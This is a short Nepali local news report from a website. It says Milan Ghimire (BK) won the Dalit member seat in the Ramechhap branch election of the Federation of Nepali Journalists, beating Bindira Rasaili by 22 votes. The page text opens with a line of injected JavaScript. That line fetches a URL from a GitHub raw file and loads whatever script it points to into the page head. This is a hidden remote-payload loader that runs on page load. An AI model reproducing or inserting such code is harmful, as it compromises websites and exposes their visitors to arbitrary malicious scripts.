;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
चैत २५,
रामेछाप । नेपाल पत्रकार महासंघ रामेछाप शाखाको दलित सदस्यमा जुनेली न्युजका ब्यवस्थापक, रेडियो तामाकोशीका समाचार प्रमुख एंव नेपाली रेडियो नेटोकर्का जिल्ला संवाददाता मिलन घिमिरे (बिक) बिजयी भएका छन् ।
नेपाल प्रेस युनियन र प्रेस संगठनको संयुक्त प्यानलबाट उम्मेद्वरी दिएका घिमिरेले प्रेस चौतारीकी बिन्दीरा रसाईलीलाई २२ मतले हराएका हुन् ।
जिल्लामा कूल ७७ मत् मध्ये ७३ मत् खसेको थियो ।
फेसबुक प्रतिक्रियाहरु